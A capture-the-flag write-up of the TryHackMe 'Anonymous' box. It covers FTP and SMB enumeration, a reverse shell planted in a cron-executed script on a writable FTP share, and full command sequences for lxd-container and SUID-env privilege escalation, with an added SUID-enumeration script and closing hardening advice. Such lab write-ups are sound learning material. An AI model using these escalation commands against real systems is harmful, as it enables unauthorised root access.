Anonymous is a medium-difficulty boot2root CTF on TryHackMe. Initial access was gained by injecting a reverse shell into a script on the FTP server that is executed by a cron job. Privilege escalation to root was then achieved via a misconfigured SUID binary.
First, an Nmap scan is run against the target (all ports, default scripts, version and OS detection, output saved to nmap/all).
sudo nmap 10.10.237.17 -sC -sV -p- -O -oN nmap/all
The SMB share can be enumerated with the smbclient command. First the available shares are listed.
smbclient -L //10.10.237.17/
In the next step the contents of the share were downloaded to the attacker machine, but the images found there did not contain any valuable information.
On the FTP server anonymous login is allowed.
The FTP server contains a scripts folder to which the anonymous user has full access, including write access. Inside this folder there are three files, which are downloaded to the attacker machine for analysis. The to_do.txt file does not contain any valuable information. The clean.sh file is the script that the cron job executes.
In the next step a reverse shell was placed into clean.sh and the modified file was uploaded back to the FTP server, which is possible because the folder is writable. Next a listener was started with pwncat. After waiting for the cron job to run the script, the box connected to the listener.
Once the shell is in, the output of the id command shows that the user namelessone is a member of the lxd group. Membership in this group can be abused to gain a root shell by running a privileged container that mounts the host's root filesystem. First a container image is built on the attacker machine with the following commands:
sudo apt update
sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools
go get -d -v github.com/lxc/distrobuilder
cd $HOME/go/src/github.com/lxc/distrobuilder
make
cd
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8
This produces the two files lxd.tar.xz and rootfs.squashfs inside $HOME/ContainerImages/alpine/. Now these files have to be uploaded to the target, which can easily be done with pwncat. After pressing Ctrl+D to switch to the pwncat prompt, the following commands upload lxd.tar.xz and rootfs.squashfs into the /tmp folder of the target.
upload /home/kali/ContainerImages/alpine/lxd.tar.xz /tmp
upload /home/kali/ContainerImages/alpine/rootfs.squashfs /tmp
After that press Ctrl+D again to return to the remote shell. Now the image has to be imported and the container built on the victim machine with the following commands (lxd init can be accepted with its defaults):
cd /tmp
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxd init
lxc init alpine privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
Finally the container is started and a shell is spawned inside it; the host filesystem is then reachable under /mnt/root.
lxc start privesc
lxc exec privesc /bin/sh
Unfortunately I was not able to get the root flag this way. So another privilege escalation had to be found. To find another attack vector the LinEnum script was used. On my machine the script is located at /opt/LinEnum/LinEnum.sh. It can easily be uploaded to the victim with pwncat.
upload /opt/LinEnum/LinEnum.sh /tmp/LinEnum.sh
Now it can be run from the /tmp folder on the target.
Among other things, this script lists binaries with the SUID bit set. Here the env binary has the SUID bit set, which is enough to elevate privileges to root: env executes the given program with the effective UID it inherited, and the -p flag tells the shell not to reset its effective UID to the real one.
env /bin/sh -p
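The enumeration step, as an added example that is not part of the original writeup: it lists SUID binaries the same way LinEnum does and flags those known to hand over a shell with the owner's privileges. The listing in SAMPLE_SUID is constructed to stand in for the box's output; on a real host the output of enumerate_suid would be piped into flag_spawners instead.

```shell
#!/bin/sh
# Added example; not code from the original writeup.
# Enumerate SUID binaries and flag the ones that can spawn a shell while
# keeping the owner's effective UID. SAMPLE_SUID below is constructed.

# Binaries known to keep the effective UID when they spawn a program
# (a subset of the usual SUID list on GTFOBins).
SHELL_SPAWNERS="env bash sh dash find vim nano python python3 perl cp"

# Real enumeration: SUID bit, regular files only, permission errors hidden.
enumerate_suid() {
    find / -perm -4000 -type f 2>/dev/null
}

# POSIX test for the SUID bit on a single path.
is_suid() {
    [ -u "$1" ]
}

# Read one path per line on stdin, print those worth a closer look.
flag_spawners() {
    while IFS= read -r path; do
        name=${path##*/}
        for s in $SHELL_SPAWNERS; do
            if [ "$name" = "$s" ]; then
                printf '%s\n' "$path"
                break
            fi
        done
    done
}

# Constructed listing standing in for enumerate_suid output on the box.
SAMPLE_SUID='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/env
/bin/ping
/usr/lib/openssh/ssh-keysign'

# Wrapper used by the demo and the test.
flag_sample() {
    printf '%s\n' "$SAMPLE_SUID" | flag_spawners
}

# Once a hit such as /usr/bin/env is confirmed with is_suid, escalate with:
#   env /bin/sh -p
# and verify with `id` that the effective UID (euid) is 0.
```

Usage on a live target would be `enumerate_suid | flag_spawners`; the remaining entries of the full listing (passwd, sudo, ping) are SUID by design and are not shell spawners, which is why the filter is worth having on a long list.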
The FTP server should not allow anonymous login. If anonymous access is required, the anonymous user must not be able to read sensitive information, and must not be able to write into any FTP folder; a writable script that a cron job executes is exactly what made initial access possible here. Furthermore, namelessone should not be a member of the lxd group unless it is needed, since lxd membership is effectively root access. Finally, the SUID bit should be removed from the env binary.